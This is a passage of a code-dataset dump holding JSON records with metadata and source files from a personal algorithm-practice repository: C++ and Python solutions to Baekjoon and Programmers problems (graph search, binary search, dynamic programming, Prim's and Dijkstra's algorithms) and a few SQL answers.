m ; i++) {\n int x, y;\n cin >> x >> y;\n arr[x][y] = arr[y][x] = 1;\n }\n\n dfs(a, 1);\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.34279918670654297, "alphanum_fraction": 0.36916837096214294, "avg_line_length": 17.62264060974121, "blob_id": "9079c6c8f5be3f0b81661b80672f547157a3c794", "content_id": "ba0ac0f1a8bbfd30177ca8399a2e5487d433dba8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 994, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/Binary Search/1920.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 1920번: 수 찾기\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n bool flag = false;\n cin >> n;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n \n sort(arr, arr + n);\n\n cin >> m;\n for(int i = 0 ; i < m ; i++){\n int num;\n cin >> num;\n\n int start = 0;\n int end = n - 1;\n int mid = 0;\n\n while(start <= end){\n mid = (start + end) / 2;\n\n if(arr[mid] == num){\n cout << 1 << \"\\n\";\n flag = true;\n break;\n }\n else if(arr[mid] < num){\n start = mid + 1;\n }\n else if(arr[mid] > num){\n end = mid - 1;\n }\n }\n\n if(!flag)\n cout << 0 << \"\\n\";\n else\n flag = false;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4457399249076843, "alphanum_fraction": 0.48520180583000183, "avg_line_length": 17.295082092285156, "blob_id": "e527d5d6ba90c532093c58f6bbdaedbf826c8c2b", "content_id": "c815b994b23b2d7f7c342f12614ac6dc4596f3b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 100, "num_lines": 61, "path": "/BOJ/BFS_DFS/2178.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2178번: 미로 탐색\nDATE: 2021-01-19\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100\n\nusing namespace std;\nint n, m;\nint maze[MAX][MAX];\nint dx[] = { 0, 0, -1, 1 };\nint dy[] = { -1, 1, 0, 0 };\nbool visited[MAX][MAX] = { false, };\n\nvoid bfs() {\n\tqueue<pair<int, int>> q;\n\tpair<int, int> p; //현재 위치\n\n\tq.push(make_pair(0, 0));\n\tvisited[0][0] = true;\n\n\twhile (!q.empty()) {\n\t\tp = q.front();\n\t\tq.pop();\n\n\t\tfor (int i = 0; i < 4; i++) {\n\t\t\tint ny = p.first + dy[i];\n\t\t\tint nx = p.second + dx[i];\n\n\t\t\tif (p.first + dy[i] < 0 || p.first + dy[i] >= n || p.second + dx[i] < 0 || p.second + dx[i] >= m)\n\t\t\t\tcontinue;\n\t\t\tif (nx >= 0 && ny >= 0 && ny < n && nx < m && maze[ny][nx] == 1 && visited[ny][nx] == false) {\n\t\t\t\tvisited[ny][nx] = true;\n\t\t\t\tq.push(make_pair(ny, nx));\n\t\t\t\tmaze[ny][nx] = maze[p.first][p.second] + 1; //거리 구하기\n\t\t\t}\n\t\t}\n\t}\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\t\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tstring str;\n\t\tcin >> str;\n\t\tfor (int j = 0; j < m; j++) {\n\t\t\tmaze[i][j] = str[j] - '0';\n\t\t}\n\t}\n\n\tbfs();\n\n\tcout << maze[n - 1][m - 1];\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.37295082211494446, "alphanum_fraction": 0.44262295961380005, "avg_line_length": 15.862069129943848, "blob_id": "03df31deda58006a312e49617f3ba869773eb86b", "content_id": "4817a15455d1405e2715f560d92b9b2fa533c7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 496, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/9095.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9095번: 1, 2, 3 더하기\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\nint dp[11];\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc;\n cin >> tc;\n\n dp[1] = 1;\n dp[2] = 2;\n dp[3] = 4;\n\n for(int i = 4 ; i < 11 ; i++){\n dp[i] = dp[i - 1] + dp[i - 2] + dp[i - 3];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int num;\n cin >> num;\n cout << dp[num] << '\\n';\n }\n \n return 0;\n}" }, { "alpha_fraction": 0.47975707054138184, "alphanum_fraction": 0.5050607323646545, "avg_line_length": 17.660377502441406, "blob_id": "d2ad3bb5137832edcb54ec62c3d5a581428aa81a", "content_id": "d89e8b7d341250c83556d98657df48286b25b538", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/MST/1197_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1197번: 최소 스패닝 트리\nDATE: 2022-03-02\nPrim Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define pii pair<int,int>\n#define MAX 10001\nusing namespace std;\n\nvector<pii> edge[MAX];\nbool visited[MAX];\nint ans;\n\nvoid prim(){\n priority_queue<pii, vector<pii>, greater<pii>> pq;\n pq.push({0, 1});\n\n while(!pq.empty()){\n int dis = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(visited[cur]) continue; \n visited[cur] = true;\n ans += dis;\n\n for(int i = 0 ; i < edge[cur].size() ; i++){\n if(visited[edge[cur][i].second]) continue;\n pq.push(edge[cur][i]);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e;\n int a, b, c;\n cin >> v >> e;\n\n for(int i = 0 ; i < e ; i++){\n cin >> a >> b >> c;\n edge[a].push_back({c, b});\n edge[b].push_back({c, a});\n }\n\n prim();\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4353582561016083, "alphanum_fraction": 0.4548286497592926, "avg_line_length": 20.41666603088379, "blob_id": "20d84a663476eb76a8eac1446dd385786cbbb115", "content_id": "5b822af54a25dac1f40e1b168b8a9ba26827ddc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1388, "license_type": "no_license", "max_line_length": 97, "num_lines": 60, "path": "/BOJ/Prefix Sum/10800.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10800번: 컬러볼\nDATE: 2021-08-05\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nstruct Info{\n int size;\n int color;\n int index;\n};\n\nbool cmp(const Info& a, const Info& b){\n if(a.size == b.size) return a.color < b.color;\n return a.size < b.size;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, c, s, idx, sum_size=0;\n cin >> n;\n \n Info info[n];\n int sum_color[n]= {0,}, ans[n] = {0,};\n\n for(int i = 0 ; i < n ; i++){\n cin >> c >> s;\n info[i].size = s;\n info[i].color = c - 1;\n info[i].index = i;\n }\n\n sort(info, info + n, cmp);\n\n for(int i = 0 ; i < n ; i++){\n idx = i;\n\n for(int j = idx ; j < n ; j++){ // 같은 크기의 공만큼 idx 증가\n if(info[i].size == info[j].size) idx++;\n else break;\n }\n\n for(int j = i ; j < idx ; j++){\n ans[info[j].index] = sum_size - sum_color[info[j].color]; // 자기 공과 색이 다른 공만 잡을 수 있으므로\n }\n\n for(int j = i ; j < idx ; j++){\n sum_size += info[j].size; // 전체 크기 누적\n sum_color[info[j].color] += info[j].size; // 색상 별 크기 누적\n }\n\n i = idx - 1; // 다음 크기로 넘어감\n }\n\n for(int i = 0 ; i < n ; i++) cout << ans[i] << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.397082656621933, "alphanum_fraction": 0.4278768301010132, "avg_line_length": 20.310344696044922, "blob_id": "b505bba62dcef415d430d16dc7c31b431eb9155a", "content_id": "6beabf690cc655a82e9fcc0f2aaae1a7eca9c80b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "no_license", "max_line_length": 36, "num_lines": 29, "path": "/programmers/Level 3/the_farthest_node.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 가장 먼 노드\n# date: 2022-04-15\ndef solution(n, edge):\n graph = [[] for _ in range(n+1)]\n visited = [False] * (n + 1)\n d = [[]] * (n + 1)\n\n for a, b in edge:\n graph[a].append(b)\n graph[b].append(a)\n \n queue = []\n queue.append(1)\n visited[1] = True\n d[1] = 0\n \n while queue:\n cur = queue.pop(0)\n \n for i in graph[cur]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n d[i] = d[cur] + 1\n \n d = d[1:]\n answer = d.count(max(d))\n \n return answer" }, { "alpha_fraction": 0.44897958636283875, "alphanum_fraction": 0.5020408034324646, "avg_line_length": 15.931034088134766, "blob_id": "8f3cbfb8dd7c7180538a8ff1d2b75ee11b2e369c", "content_id": "8cb32525f42dd173621aba6aa10a38e1cf982f7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 498, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/1912.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1912번: 연속합\nDATE: 2021-07-20\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long input[100001];\n long long n, ans;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> input[i];\n }\n\n ans = input[0];\n\n for(int i = 1 ; i < n ; i++){\n input[i] = max(input[i], input[i] + input[i-1]);\n ans = max(ans, input[i]);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3304195702075958, "alphanum_fraction": 0.3723776340484619, "avg_line_length": 18.100000381469727, "blob_id": "8d744d426e1dc364180a80181865aaae09014e44", "content_id": "bf2b356e6250f5db1514d5d466469e8c75e54c8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 592, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Mathematics/2960.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2960번: 에라토스테네스의 체\nDATE: 2021-10-10\n*/\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[1001] = {0, };\n int n, k, cnt = 0;\n cin >> n >> k;\n\n for(int i = 2 ; i <= n ; i++) {\n for(int j = i ; j <= n ; j += i) {\n if(arr[j] == 0) {\n cnt++;\n arr[j] = j;\n }\n if(cnt == k) {\n cout << j;\n break;\n }\n }\n if(cnt == k) break;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4482225775718689, "alphanum_fraction": 0.4822256565093994, "avg_line_length": 17.514286041259766, "blob_id": "3eeb34fb313039ba890db7b88a36ce1a5ec30912", "content_id": "3e791af8aa138b5b396c30ea94ec2863160b1adc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 695, "license_type": "no_license", "max_line_length": 84, "num_lines": 35, "path": "/BOJ/Binary Search/1300.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1300번: K번째 수\nDATE: 2022-02-09\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, k;\n long long left, right, mid, ans;\n\n cin >> n >> k;\n\n left = 0; right = n * n;\n\n while(left <= right) {\n long long cnt = 0;\n mid = (left + right) / 2; // K번째 수를 mid라고 설정\n\n for(int i = 1 ; i <= n ; i++) cnt += min(mid / i, n); // mid보다 작거나 같은 숫자의 개수\n\n if(cnt < k) left = mid + 1;\n else {\n right = mid - 1;\n ans = mid; \n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4008843004703522, "alphanum_fraction": 0.4340457022190094, "avg_line_length": 21.633333206176758, "blob_id": "df75b3a3ef5c9c645d3193fc893d9c3ffa7d65f4", "content_id": "dcbfb95dac265b209d930c0363b9bfc4ef86dbfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1357, "license_type": "no_license", "max_line_length": 55, "num_lines": 60, "path": "/programmers/Level 2/tuple.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2 : Tuple\n//2019 KAKAO Winter Internship\n//2021-05-07\n#include <string>\n#include <vector>\n#include <iostream>\n#include <algorithm>\n#include <map>\nusing namespace std;\n\nbool cmp(vector<int> a, vector<int> b){\n return a.size() < b.size();\n}\n\nvector<int> solution(string s) {\n vector<vector<int>> tmp1;\n vector<int> answer, tmp2;\n map<int, int> m;\n string ss;\n\n for(int i = 0 ; i < s.length() ; i++){\n if(s[i] != '{' && s[i] != '}' && s[i] != ','){ \n ss += s[i];\n }\n else if(s[i] == ',' && s[i + 1] != '{'){\n tmp2.push_back(atoi(ss.c_str()));\n ss=\"\";\n }\n else if(s[i] == '}' && s[i + 1] != '}'){\n tmp2.push_back(atoi(ss.c_str()));\n tmp1.push_back(tmp2);\n tmp2.clear();\n ss=\"\";\n }\n }\n \n sort(tmp1.begin(), tmp1.end(), cmp);\n\n for(int i = 0 ; i < tmp1.size() ; i++){\n for(int j = 0 ; j < tmp1[i].size() ; j++){\n if(m[tmp1[i][j]] > 0)\n continue;\n answer.push_back(tmp1[i][j]);\n m[tmp1[i][j]]++;\n }\n }\n\n return answer;\n}\n\nint main(){\n string s = \"{{2},{2,1},{2,1,3},{2,1,3,4}}\";\n vector <int> answer = solution(s);\n \n for(int i = 0 ; i < answer.size(); i++){\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.45119306445121765, "alphanum_fraction": 0.494577020406723, "avg_line_length": 16.769229888916016, "blob_id": "be9600bb159ddc8967d67512146afa2879e89e1f", "content_id": "dd4b2896f18e5596b107c6eb2f30ec8652c6a040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 469, "license_type": "no_license", "max_line_length": 67, "num_lines": 26, "path": "/programmers/Level 1/find_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 소수 찾기\ndate: 2022-05-26\n*/\n#include <string>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nint isNotPrime[1000001];\n\nint solution(int n) {\n int answer = 0;\n \n for(int i = 2 ; i <= sqrt(n) ; i++){\n if(!isNotPrime[i]) {\n for(int j = i * i ; j <= n ; j += i) isNotPrime[j] = 1;\n }\n }\n \n for(int i = 2 ; i <= n ; i++){\n if(!isNotPrime[i]) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.43414634466171265, "alphanum_fraction": 0.46097561717033386, "avg_line_length": 20.63157844543457, "blob_id": "6ccdc02b544af2226e97b13cc1435bcf50391008", "content_id": "8fec4e02e5b2f5f489e65931d74b2150e5e0b900", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/programmers/Level 3/network.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 네트워크\n# date: 2022-04-15\ndef solution(n, computers):\n answer = 0\n visited = [False] * n\n \n def dfs(i, n):\n visited[i] = True;\n\n for j in range(n):\n if(computers[i][j] and visited[j] == False):\n dfs(j, n)\n \n for i in range(n):\n if not visited[i]:\n answer += 1;\n dfs(i, n)\n \n return answer" }, { "alpha_fraction": 0.41563186049461365, "alphanum_fraction": 0.44241538643836975, "avg_line_length": 21.822221755981445, "blob_id": "664318206c8c2f6f538d8665d22b3f44750e4520", "content_id": "0d6f88b371c2cf94c6d92dd6c12185f6fac37eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4133, "license_type": "no_license", "max_line_length": 88, "num_lines": 180, "path": "/BOJ/Implementation/21608.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 21608번: 상어 초등학교\nDATE: 2021-11-08\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#define MAX 20\nusing namespace std;\nvector<int> v[MAX * MAX];\nvector<pair<int,int>> location_1, location_2;\nint classroom[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint n;\n\nint getLikeStd(int x, int y, vector<int> like){\n int cnt = 0;\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n if(find(like.begin(), like.end(), classroom[nx][ny]) != like.end()) {\n cnt++;\n }\n }\n\n return cnt;\n}\n\nint getEmptyCount(int x, int y) {\n int cnt = 0;\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n ) continue;\n if(classroom[nx][ny] == 0) cnt++;\n }\n\n return cnt;\n}\n\nint step1(int num, int student) {\n vector<int> like;\n int maxNum = -1, maxCnt = 0, x = 0, y = 0;\n\n for(int i = 1 ; i <= 4 ; i++) like.push_back(v[num][i]);\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(classroom[i][j] > 0) continue;\n int cnt = getLikeStd(i, j, like);\n \n if(cnt > maxNum) {\n maxNum = cnt;\n maxCnt = 0;\n location_1.clear();\n location_1.push_back(make_pair(i, j));\n x = i; y = j;\n }\n else if(cnt == maxNum) {\n maxCnt++;\n location_1.push_back(make_pair(i, j));\n }\n }\n }\n \n if(maxCnt == 0) {\n classroom[x][y] = student;\n return 1;\n }\n else return 0;\n}\n\nint step2(int num, int student) {\n vector<int> like;\n int maxNum = -1, maxCnt = 0, x, y;\n\n for(int i = 1 ; i <= 4 ; i++) like.push_back(v[num][i]);\n\n for(int i = 0 ; i < location_1.size() ; i++) {\n int cnt = getEmptyCount(location_1[i].first, location_1[i].second);\n \n if(cnt > maxNum) {\n maxNum = cnt;\n maxCnt = 0;\n location_2.clear();\n location_2.push_back(make_pair(location_1[i].first, location_1[i].second));\n x = location_1[i].first; y = location_1[i].second;\n }\n else if(cnt == maxNum) {\n maxCnt++;\n location_2.push_back(make_pair(location_1[i].first, location_1[i].second));\n }\n }\n\n if(maxCnt == 0) {\n classroom[x][y] = student;\n return 1;\n }\n else return 0;\n}\n\nvoid step3(int num, int student) {\n vector<pair<int,int>> rowCol;\n int x, y;\n\n for(int i = 0 ; i < location_2.size() ; i++) {\n rowCol.push_back(make_pair(location_2[i].first, location_2[i].second));\n }\n\n sort(rowCol.begin(), rowCol.end());\n\n x = rowCol[0].first;\n y = rowCol[0].second;\n\n classroom[x][y] = student;\n return;\n}\n\nint calcVal(int x, int y, int num) {\n int idx, cnt = 0;\n\n for(int i = 0 ; i < n * n ; i++) {\n if(v[i][0] == num) {\n idx = i;\n }\n }\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n) continue;\n if(find(v[idx].begin(), v[idx].end(), classroom[nx][ny]) != v[idx].end()) cnt++;\n }\n\n return cnt; \n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n * n ; i++) {\n cin >> a;\n v[i].push_back(a);\n\n for(int j = 0 ; j < 4 ; j++) { // 좋아하는 학생\n cin >> b;\n v[i].push_back(b);\n }\n }\n\n for(int i = 0 ; i < n * n ; i++) {\n int idx;\n idx = v[i][0];\n\n if(step1(i, idx)) continue;\n if(step2(i, idx)) continue;\n step3(i, idx);\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n int cnt = calcVal(i, j, classroom[i][j]);\n if (cnt > 0) ans += pow(10, cnt - 1);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.33816424012184143, "alphanum_fraction": 0.3719806671142578, "avg_line_length": 17.294116973876953, "blob_id": "48e91a14b06c536341ddef627c437bab4b1ed7e1", "content_id": "4453bcb9db961aa8a6d1a87870c4e1019fad27f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 637, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Implementation/14235.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14235번: 크리스마스 선물\n2022-01-14\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int> pq;\n int n, a, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> a;\n\n if(a > 0){\n for(int j = 0 ; j < a ; j++){\n cin >> num;\n pq.push(num);\n }\n }\n else{\n if(pq.empty()) cout << -1 << '\\n';\n else {\n cout << pq.top() << '\\n';\n pq.pop();\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3947368562221527, "alphanum_fraction": 0.4254385828971863, "avg_line_length": 18.571428298950195, "blob_id": "8e767093ee385f313a46f0973e41ef290636ec4a", "content_id": "fb60dd4dd4a6bc37b7794b092d5618ae205a710e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 688, "license_type": "no_license", "max_line_length": 63, "num_lines": 35, "path": "/BOJ/Mathematics/9613.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9613번: GCD 합\nDATE: 2022-01-24\nEuclidean algorithm\n*/\n#include <iostream>\nusing namespace std;\n\nlong long gcd(int a, int b){\n return b ? gcd(b, a % b): a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++){\n cin >> n;\n long long arr[n], sum = 0;\n\n for(int j = 0 ; j < n ; j++) cin >> arr[j];\n\n for(int j = 0 ; j < n ; j++){\n for(int k = j + 1 ; k < n ; k++){\n if(arr[j] > arr[k]) sum += gcd(arr[j], arr[k]);\n else sum += gcd(arr[k], arr[j]);\n }\n }\n\n cout << sum << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6203208565711975, "alphanum_fraction": 0.6541889309883118, "avg_line_length": 22.375, "blob_id": "fe50943633c2dfc5448ac89b5416816acdb58904", "content_id": "d5ec00616e1ac7b9f0e3d2ec640e59d5905973c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 607, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/programmers/SQL/ETC.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "**[1. 우유와 요거트가 담긴 장바구니 (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/62284)**\n\n```sql\nSELECT DISTINCT A.CART_ID\nFROM CART_PRODUCTS A INNER JOIN CART_PRODUCTS B ON A.CART_ID = B.CART_ID\nWHERE (A.NAME IN ('Milk', 'Yogurt') and B.NAME IN ('Milk', 'Yogurt')) and A.NAME != B.NAME\nORDER BY A.CART_ID\n```\n\n<br/>\n\n**[2. 헤비 유저가 소유한 장소 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/77487)**\n\n```sql\nSELECT *\nFROM PLACES\nWHERE HOST_ID IN (\n SELECT HOST_ID\n FROM PLACES\n GROUP BY HOST_ID\n HAVING COUNT(*) >= 2\n)\nORDER BY ID\n```\n" }, { "alpha_fraction": 0.32755032181739807, "alphanum_fraction": 0.367106169462204, "avg_line_length": 19.309858322143555, "blob_id": "d7bd065709d781e35ebe6e71c545af9bc87ea9e1", "content_id": "34b22d39d7ce7186be48b34860a3a2920edd66d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1451, "license_type": "no_license", "max_line_length": 99, "num_lines": 71, "path": "/BOJ/BFS_DFS/4963.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4963번: 섬의 개수\nDATE: 2022-02-02\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 50\nusing namespace std;\n\nint w, h;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\nint dy[8] = {0, 1, 1, 1, 0, -1, -1, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int,int>> q;\n\n q.push({x, y});\n visited[x][y] = 1;\n\n while(!q.empty()){\n x = q.front().first;\n y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 8 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= h || ny >= w || visited[nx][ny] || !arr[nx][ny]) continue;\n\n q.push({nx, ny});\n visited[nx][ny] = 1;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n while(1) {\n cin >> w >> h;\n\n if(w == 0 && h == 0) break;\n int ans = 0;\n\n for(int i = 0 ; i < h ; i++) {\n for(int j = 0 ; j < w ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < h ; i++) {\n for(int j = 0 ; j < w ; j++) {\n if(arr[i][j] && !visited[i][j]) {\n bfs(i, j);\n ans++;\n }\n }\n }\n\n cout << ans << '\\n';\n\n fill(&arr[0][0], &arr[h - 1][w], 0);\n fill(&visited[0][0], &visited[h - 1][w], false);\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4458955228328705, "alphanum_fraction": 0.4670397937297821, "avg_line_length": 21.041095733642578, "blob_id": "a8a917540ec52a6f4c006fbc3bfdfe33bbbf9f9d", "content_id": "4c885d8b741a4250527502fe70cbe54a4c119954", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 94, "num_lines": 73, "path": "/BOJ/Dijkstra/10282.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10282번: 해킹\nDATE: 2022-01-11\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <algorithm>\n#define MAX 10001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int,int>> graph[MAX];\nint dst[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 거리, 노드\n\n pq.push({0, start});\n dst[start] = 0;\n\n while(!pq.empty()){\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(distance > dst[cur]) continue;\n for(int i = 0 ; i < graph[cur].size() ; i++){\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(distance + newDistance < dst[next]){\n dst[next] = distance + newDistance;\n pq.push({dst[next], next});\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n int n, d, c;\n int a, b, s;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++){\n cin >> n >> d >> c;\n\n for(int j = 0 ; j < d ; j++){\n cin >> a >> b >> s;\n graph[b].push_back({a, s}); // a가 b를 의존 \n }\n\n fill(dst, dst + n + 1, INF);\n dijkstra(c);\n \n int maximum = -1, cnt = 0;\n\n for(int j = 1 ; j <= n ; j++) {\n if(dst[j] == INF) continue;\n maximum = max(maximum, dst[j]);\n cnt++;\n }\n\n cout << cnt << \" \" << maximum << '\\n';\n\n for(int j = 1 ; j <= n ; j++) graph[j].clear();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3928571343421936, "alphanum_fraction": 0.41474655270576477, "avg_line_length": 24.79207992553711, "blob_id": "84c21a9cccd00fb251d2f78f9ec7c31ece158c7a", "content_id": "820841ba72e9ca16e60251b5e2dd6db0f1b13473", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2656, "license_type": "no_license", "max_line_length": 86, "num_lines": 101, "path": "/programmers/Level 2/maximize_formula.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "//programmers Level 2 : Maximize formula\n//2020 KAKAO Internship\n//2021-04-30\n#include <string>\n#include <vector>\n#include <queue>\n#include <iostream>\nusing namespace std;\n\nvector<string> op, new_exp, cp;\npriority_queue<long long> pq;\nint n;\nlong long pArr[3] = {0,};\nbool check[4] = {false,};\n\nvoid permutation(int depth){\n if(depth == n){\n long long num;\n \n for(int i = 0 ; i < n ; i++){ //연산자 우선순위대로\n for(int j = 0 ; j < new_exp.size() ; j++){\n if(new_exp[j] == op[pArr[i] - 1]){ //연산자\n if(new_exp[j] == \"+\")\n num = stoll(new_exp[j-1]) + stoll(new_exp[j+1]); \n else 